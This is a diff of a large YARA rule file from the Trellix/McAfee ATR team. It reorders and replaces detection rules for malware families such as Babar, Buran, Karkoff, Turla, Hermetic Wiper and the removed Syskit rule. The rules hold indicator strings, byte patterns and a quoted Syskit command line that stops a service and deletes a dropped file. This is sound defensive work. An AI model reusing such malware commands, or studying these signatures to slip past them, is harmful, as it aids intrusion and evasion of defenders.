-		description = "Rule to detect Babar malware"
+		description = "Rule to detect Jeff Dev Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "3cbb63ce-ff93-51ee-93aa-2594fa1f8dad"
-		date = "2015-02-18"
+		id = "dd5e24f4-a2d8-5db5-9e7e-7f8bded5d401"
+		date = "2018-08-26"
 		modified = "2020-08-14"
-		reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_babar_pdb.yar#L1-L35"
+		reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_jeff_dev.yar#L1-L28"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "c72a055b677cd9e5e2b2dcbba520425d023d906e6ee609b79c643d9034938ebf"
-		logic_hash = "02acef92691caed4573b609c111302427b9c27c5ef93f9199c52d75cb13e8615"
+		hash = "386d4617046790f7f1fcf37505be4ffe51d165ba7cbd42324aed723288ca7e0a"
+		logic_hash = "58a408f4e1781540e4abdb87b85b94c1f0ea49b40bf241d6d074bc2162ac2032"
 		score = 75
 		quality = 45
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Babar"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Jeff"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "c:\\Documents and Settings\\admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper Release\\Release.pdb" fullword ascii
-		$s2 = "%COMMON_APPDATA%" fullword ascii
-		$s3 = "%%WINDIR%%\\%s\\%s" fullword ascii
-		$s4 = "/s /n %s \"%s\"" fullword ascii
-		$s5 = "/c start /wait " fullword ascii
-		$s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii
-		$s7 = "constructor or from DllMain." fullword ascii
-		$s8 = "ComSpec" fullword ascii
-		$s9 = "APPDATA" fullword ascii
-		$s10 = "WINDIR" fullword ascii
-		$s11 = "USERPROFILE" fullword ascii
+		$s1 = "C:\\Users\\Umut\\Desktop\\takemeon" fullword wide
+		$s2 = "C:\\Users\\Umut\\Desktop\\" fullword ascii
+		$s3 = "PRESS HERE TO STOP THIS CREEPY SOUND AND VIEW WHAT HAPPENED TO YOUR COMPUTER" fullword wide
+		$s4 = "WHAT YOU DO TO MY COMPUTER??!??!!!" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB ) and all of them
 }
-rule TRELLIX_ARC_Apt_Lagulon_Trojan_Pdb : TROJAN FILE
+rule TRELLIX_ARC_Buran_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect trojan Lagulon based on PDB"
+		description = "Rule to detect Buran ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "a31a465d-1f16-5c3e-a62d-ea15c11253c3"
-		date = "2013-08-31"
+		id = "b96c0e5c-dce2-559d-9623-81e8a9a322f2"
+		date = "2019-11-05"
 		modified = "2020-08-14"
-		reference = "https://www.cylance.com/operation-cleaver-cylance"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_lagulon_pdb.yar#L1-L25"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Buran.yar#L1-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "e401340020688cdd0f5051b7553815eee6bc04a5a962900883f1b3676bf1de53"
-		logic_hash = "dad04c2deb990f253f952b768b74349dc9afb5f6db91ea3afff889f4c9f3230b"
+		logic_hash = "056cf2e6aca22876fb8bfafc14a3be0e42124a26edab42a6f7a928c87fb8fff4"
 		score = 75
 		quality = 70
-		tags = "TROJAN, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/lagulon"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Buran"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\proj\\wndTest\\Release\\wndTest.pdb"
+		$s1 = { 5? 8B ?? 81 C? ?? ?? ?? ?? 5? 5? 5? 33 ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 89 ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? C6 ?? ?? ?? ?? ?? ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? 8D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B ?? ?? E8 ?? ?? ?? ?? 5? E8 ?? ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 84 ?? 0F 85 }
+		$s2 = { 4? 33 ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? 8B ?? FF 5? ?? FF 7? ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 5? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? 0F B6 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 7? ?? 8D ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 5? E8 ?? ?? ?? ?? 85 ?? 74 }
+		$s3 = { A1 ?? ?? ?? ?? 99 5? 5? A1 ?? ?? ?? ?? 99 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 03 ?? ?? 13 ?? ?? ?? 83 ?? ?? E8 ?? ?? ?? ?? 5? 5? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 03 ?? ?? 13 ?? ?? ?? 83 ?? ?? 89 ?? ?? 89 ?? ?? A1 ?? ?? ?? ?? 99 5? 5? 8B ?? ?? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 03 ?? ?? ?? 13 ?? ?? ?? 89 ?? ?? 89 ?? ?? A1 ?? ?? ?? ?? 4? 99 89 ?? ?? 89 ?? ?? FF 7? ?? FF 7? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 3B ?? ?? 75 }
+		$s4 = { 5? 5? 5? 5? 8B ?? 33 ?? 5? 68 ?? ?? ?? ?? 64 ?? ?? 64 ?? ?? 68 ?? ?? ?? ?? 8D ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? 89 ?? ?? 8D ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? ?? 0F 84 }
+		$s5 = { 5? 8B ?? 83 ?? ?? 5? 5? 5? 89 ?? ?? 8B ?? 89 ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? 8B ?? ?? ?? 8B ?? ?? ?? 83 ?? ?? 83 ?? ?? 5? 5? A1 ?? ?? ?? ?? 99 E8 ?? ?? ?? ?? 89 ?? ?? E8 ?? ?? ?? ?? 89 ?? ?? E8 ?? ?? ?? ?? 89 ?? ?? 8B ?? 8B ?? ?? 8B ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? 8B ?? ?? 8B ?? E8 ?? ?? ?? ?? 8B ?? ?? 8B ?? E8 ?? ?? ?? ?? 8B ?? ?? 2B ?? 8B ?? 4? 5? 8B ?? ?? 8B ?? 83 ?? ?? B9 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 83 ?? ?? 0F 8C }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and any of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule TRELLIX_ARC_Apt_Elise_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_Karkoff_Dnspionaje : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Elise APT based on the PDB reference"
+		description = "Rule to detect the Karkoff malware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "cc8dd203-baad-5800-ba2c-f9c47d8ca6f0"
-		date = "2017-05-31"
+		id = "a5cdc65f-3a4c-5d97-9d88-8d60b14dfb9a"
+		date = "2019-04-23"
 		modified = "2020-08-14"
-		reference = "https://attack.mitre.org/software/S0081/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_elise_pdb.yar#L1-L29"
+		reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_karkoff_dnspionaje.yar#L1-L30"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "b426dbe0f281fe44495c47b35c0fb61b28558b5c8d9418876e22ec3de4df9e7b"
-		logic_hash = "bb7eee8082aa0f6634a8c4cdb9cbe0e2a7f00b97e48609c81a21bdaac64a5496"
+		hash = "5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c"
+		logic_hash = "79dd0087f1197cb1b2cd98416302363951479ba5ebf82289768585b56ed21c3a"
 		score = 75
 		quality = 70
 		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
 		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Elise"
-		actor_type = "Cybercrime"
+		malware_family = "Backdoor:W32/Karkoff"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\lstudio\\projects\\lotus\\elise\\Release\\EliseDLL\\i386\\EliseDLL.pdb"
-		$pdb1 = "\\LStudio\\Projects\\Lotus\\Elise\\Release\\SetElise.pdb"
-		$pdb2 = "\\lstudio\\projects\\lotus\\elise\\Release\\SetElise\\i386\\SetElise.pdb"
-		$pdb3 = "\\LStudio\\Projects\\Lotus\\Elise\\Release\\Uninstaller.pdb"
-		$pdb4 = "\\lstudio\\projects\\lotus\\evora\\Release\\EvoraDLL\\i386\\EvoraDLL.pdb"
+		$s1 = "DropperBackdoor.Newtonsoft.Json.dll" fullword wide
+		$s2 = "C:\\Windows\\Temp\\MSEx_log.txt" fullword wide
+		$s3 = "DropperBackdoor.exe" fullword wide
+		$s4 = "get_ProcessExtensionDataNames" fullword ascii
+		$s5 = "get_ProcessDictionaryKeys" fullword ascii
+		$s6 = "https://www.newtonsoft.com/json 0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule TRELLIX_ARC_Apt_Gdocupload_Glooxmail : BACKDOOR FILE
+rule TRELLIX_ARC_Apt_Babar_Malware : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect gdocupload tool used by APT1"
+		description = "Rule to detect Babar malware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "deb20196-65e6-5dac-af0c-2f16e5926715"
-		date = "2013-02-19"
+		id = "3cbb63ce-ff93-51ee-93aa-2594fa1f8dad"
+		date = "2015-02-18"
 		modified = "2020-08-14"
-		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_gdocupload_pdb.yar#L1-L32"
+		reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_babar_pdb.yar#L1-L35"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "295c5c7aa5fa29628dec9f42ed657fce0bc789079c4e51932bcbc99a28dfd440"
-		logic_hash = "e016bb636af22fae79875bebaf1b4bd4f2a403e797d7ee52ea0691b4d7a54cf8"
+		hash = "c72a055b677cd9e5e2b2dcbba520425d023d906e6ee609b79c643d9034938ebf"
+		logic_hash = "02acef92691caed4573b609c111302427b9c27c5ef93f9199c52d75cb13e8615"
 		score = 75
 		quality = 45
 		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
 		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Gdocupload"
+		malware_family = "Backdoor:W32/Babar"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "https://www.google.com/accounts/ServiceLogin?service=writely&passive=1209600&continue=http://docs.google.com/&followup=http://do" ascii
-		$s2 = "Referer: http://sn114w.snt114.mail.live.com/mail/AttachmentUploader.aspx?_ec=1" fullword ascii
-		$s3 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET " ascii
-		$s4 = "e:\\Project\\mm\\Webmail\\Bin\\gdocs.pdb" fullword ascii
-		$s5 = "http://docs.google.com/?auth=" fullword ascii
-		$s6 = "x-guploader-client-info: mechanism=scotty flash; clientVersion=18067216" fullword ascii
-		$s7 = "http://docs.google.com/" fullword ascii
-		$s8 = "Referer: http://sn114w.snt114.mail.live.com/mail/EditMessageLight.aspx?n=%s" fullword ascii
+		$s1 = "c:\\Documents and Settings\\admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper Release\\Release.pdb" fullword ascii
+		$s2 = "%COMMON_APPDATA%" fullword ascii
+		$s3 = "%%WINDIR%%\\%s\\%s" fullword ascii
+		$s4 = "/s /n %s \"%s\"" fullword ascii
+		$s5 = "/c start /wait " fullword ascii
+		$s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii
+		$s7 = "constructor or from DllMain." fullword ascii
+		$s8 = "ComSpec" fullword ascii
+		$s9 = "APPDATA" fullword ascii
+		$s10 = "WINDIR" fullword ascii
+		$s11 = "USERPROFILE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
 rule TRELLIX_ARC_Apt_Hanover_Pdb : BACKDOOR FILE
 {
@@ -151179,201 +151360,67 @@ rule TRELLIX_ARC_Apt_Hanover_Slidewin_Pdb : BACKDOOR FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 100KB and any of them
 }
-
-rule TRELLIX_ARC_Syskit : FILE
-{
-	meta:
-		description = "SYSkit backdoor"
-		author = "Christiaan @ McAfee ATR"
-		id = "f06db38f-52d5-51b5-a17f-63e285dd5f80"
-		date = "2019-09-17"
-		modified = "2020-04-02"
-		reference = "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Tortoiseshell_Syskit.yar#L3-L40"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "5b489d47d56de5c770b6ff6d6d56bf0fb87174f4a8428052b28fb392d9ac3f87"
-		score = 75
-		quality = 68
-		tags = "FILE"
-		hash1 = "07d123364d8d04e3fe0bfa4e0e23ddc7050ef039602ecd72baed70e6553c3ae4"
-		hash2 = "f71732f997c53fa45eef5c988697eb4aa62c8655d8f0be3268636fc23addd193"
-		hash3 = "02a3296238a3d127a2e517f4949d31914c15d96726fb4902322c065153b364b2"
-
-	strings:
-		$x1 = "timeout /t 10 & sc stop dllhost & timeout /t 10 & del C:\\Windows\\Temp\\BAK.exe" fullword wide
-		$s2 = "lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R" ascii
-		$s3 = "C:\\Windows\\Temp\\rconfig.xml" fullword wide
-		$s4 = "Add-Type -AssemblyName System.IO.Compression.FileSystem" fullword wide
-		$s5 = "serviceProcessInstaller1" fullword ascii
-		$s6 = "    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)" fullword wide
-		$s7 = "exec_cmd2" fullword ascii
-		$s8 = "exec_cmd" fullword ascii
-		$s9 = "send_command_result" fullword ascii
-		$s10 = "mycontent" fullword ascii
-		$s11 = "Diagnostic Server Host" fullword wide
-		$s12 = "bytesToBeEncrypted" fullword ascii
-		$s13 = "createPostRequest" fullword ascii
-		$s14 = "myhash" fullword ascii
-		$s15 = "DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5" ascii
-		$s16 = "circle_time" fullword ascii
-		$s17 = "ServiceStart_AfterInstall" fullword ascii
-		$s18 = "serviceInstaller1" fullword ascii
-		$s19 = "BAK.ProjectInstaller.resources" fullword ascii
-		$s20 = "Dll host" fullword wide
-		$op0 = { 96 00 f1 0a 57 02 05 00 34 25 }
-		$op1 = { 96 00 83 05 5a 01 0e 00 38 28 }
-		$op2 = { 06 00 00 11 28 4d 00 00 0a 02 6f 4e 00 00 0a 28 }
-
-	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
-}
-rule TRELLIX_ARC_Apt_Hikit_Rootkit : ROOTKIT FILE
-{
-	meta:
-		description = "Rule to detect the rootkit hikit based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "c53acbc6-8f4a-590b-8dd7-ce4da6d79cf8"
-		date = "2012-08-20"
-		modified = "2020-08-14"
-		reference = "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_hikit_rootkit_pdb.yar#L1-L28"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "8a425ababdfbe95bd8ac7d4f519be16c0f1fd0b7eea2874124db2f00dd6eb56d"
-		score = 75
-		quality = 70
-		tags = "ROOTKIT, FILE"
-		rule_version = "v1"
-		malware_type = "rootkit"
-		malware_family = "Rootkit:W32/Hikit"
-		actor_type = "Cybercrime"
-		actor_group = "Unknown"
-
-	strings:
-		$pdb = "\\JmVodServer\\hikit\\bin32\\RServer.pdb"
-		$pdb1 = "\\JmVodServer\\hikit\\bin32\\w7fw.pdb"
-		$pdb2 = "\\JmVodServer\\hikit\\bin32\\w7fw_2k.pdb"
-		$pdb3 = "\\JmVodServer\\hikit\\bin64\\w7fw_x64.pdb"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and any of them
-}
-rule TRELLIX_ARC_Enfal_Pdb : BACKDOOR FILE
-{
-	meta:
-		description = "Rule to detect Enfal malware"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "09b9667c-cf58-5438-958d-19a99fe91e32"
-		date = "2013-08-27"
-		modified = "2020-08-14"
-		reference = "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/enfal"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/enfal_pdb.yar#L1-L29"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "6756808313359cbd7c50cd779f809bc9e2d83c08da90dbd80f5157936673d0bf"
-		logic_hash = "1f7785a4c54981c3e7cb417718312e0ed82132b9bd9288f7b0f322cbeafbaecd"
-		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
-		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Enfal"
-		actor_type = "Apt"
-		actor_group = "Unknown"
-
-	strings:
-		$pdb = "\\Documents and Settings\\Administrator\\My Documents\\Work\\EtenFalcon\\Release\\DllServiceTrojan.pdb"
-		$pdb1 = "\\Documents and Settings\\Administrator\\My Documents\\Work\\EtenFalcon\\Release\\ServiceDll.pdb"
-		$pdb2 = "\\Release\\ServiceDll.pdb"
-		$pdb3 = "\\muma\\0511\\Release\\ServiceDll.pdb"
-		$pdb4 = "\\programs\\LuridDownLoader\\LuridDownloader for Falcon\\ServiceDll\\Release\\ServiceDll.pdb"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
-}
-rule TRELLIX_ARC_Apt_Gauss_Pdb : BACKDOOR FILE
-{
-	meta:
-		description = "Rule to detect Gauss based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "209223cc-16e5-5596-8744-21ad71b5ec2a"
-		date = "2012-08-14"
-		modified = "2020-08-14"
-		reference = "https://securelist.com/the-mystery-of-the-encrypted-gauss-payload-5/33561/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/gauss_pdb.yar#L1-L25"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "7b0d0612b4ecc889a901115c2e77776ef0ea65c056b283d12e80f863062cea28"
-		logic_hash = "cb20c87ea976f395e000f2c631ffd52b09dca2af37adceafe5be72b37f75a997"
-		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
-		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Gauss"
-		actor_type = "Apt"
-		actor_group = "Unknown"
-
-	strings:
-		$pdb = "\\projects\\gauss\\bin\\release\\winshell.pdb"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 550KB and any of them
-}
-rule TRELLIX_ARC_Troy_Malware_Campaign_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_Apt_Turla_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect the Operation Troy based on the PDB"
+		description = "Rule to detect a component of the APT Turla"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "c1fc5b9c-104f-5d07-86ee-5a54d9731f04"
-		date = "2013-06-23"
+		id = "b39ac7fc-16dd-559e-8ab0-76da5cbbc719"
+		date = "2017-05-31"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_operation_troy.yar#L1-L26"
+		reference = "https://attack.mitre.org/groups/G0010/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_turla_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "2ca6b7e9488c1e9f39392e696704ad3f2b82069e35bc8001d620024ebbf2d65a"
-		logic_hash = "a64b4aa082c45d1753ad30ba2f67df0ef5b7658c3c99e031ef747eb4e6c7bb00"
+		hash = "3b8bd0a0c6069f2d27d759340721b78fd289f92e0a13965262fea4e8907af122"
+		logic_hash = "d519317c936a38f189bf0de908902ec4e3e079c8c7463c8881ceb332c0a82a26"
 		score = 75
 		quality = 70
 		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
 		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/OperationTroy"
+		malware_family = "Backdoor:W32/Turla"
 		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy(Winlogon_Shell)\\SetKey_WinlogOn_Shell_Modify\\BD_Installer\\Release\\BD_Installer.pdb"
-		$pdb1 = "\\Work\\Make Troy\\Concealment Troy\\Exe_Concealment_Troy(Winlogon_Shell)\\Dll\\Concealment_Troy(Dll)\\Release\\Concealment_Troy.pdb"
+		$pdb = "\\Workshop\\Projects\\cobra\\carbon_system\\x64\\Release\\carbon_system.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 650KB and any of them
 }
-rule TRELLIX_ARC_Apt_Mirage_Pdb : TROJAN FILE
+rule TRELLIX_ARC_Hermeticwiper : TROJAN FILE
 {
 	meta:
-		description = "Rule to detect Mirage samples based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "49b7623f-a2c9-52e4-8679-d62f6aae99ca"
-		date = "2012-09-18"
-		modified = "2020-08-14"
-		reference = "https://www.secureworks.com/research/the-mirage-campaign"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_mirage_pdb.yar#L1-L26"
+		description = "Detecting variants of Hermetic Wiper malware discovered in UA"
+		author = " cb @ Trellix ATR"
+		id = "fc6d9238-b732-541d-b083-11b43fe8770d"
+		date = "2022-02-24"
+		modified = "2022-02-24"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Troj_HermWiper.yar#L1-L27"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "0107a12f05bea4040a467dd5bc5bd130fd8a4206a09135d452875da89f121019"
-		logic_hash = "cb88dc787d9964451ea93f5574d9c73ae6a820d81e20d41c3c8ee44c3fee032d"
+		logic_hash = "b48e91afa19e09c7035ccda1b9293448e834d612b9a953b593f9412acb78faac"
 		score = 75
 		quality = 70
 		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Mirage"
-		actor_type = "Apt"
-		actor_group = "Unknown"
+		malware_type = "Trojan"
 
 	strings:
-		$pdb = "\\MF-v1.2\\Server\\Debug\\Server.pdb"
-		$pdb1 = "\\fox_1.2 20110307\\MF-v1.2\\Server\\Release\\MirageFox_Server.pdb"
+		$0 = {E4B5518CD941310A015E4AF8E5968C8231492FE19246A293A569D5D7A36F56EB2FC5B68FFF6F3359C19AF6806920C3FE6628F90A75440E6616297A031BA6075100D72DFAA9829E772E45D77B89F862081EAFDB19B4B2DCEF3F273FF645ACCEAA4B991F98373973C0FB25829E860D9BC195EF1A0AD9219456AD077D42868EE03EE00E88D04C434BA97E88DF99273A35E2C668A1C69954B4762390ABDFBE4CD4AF}
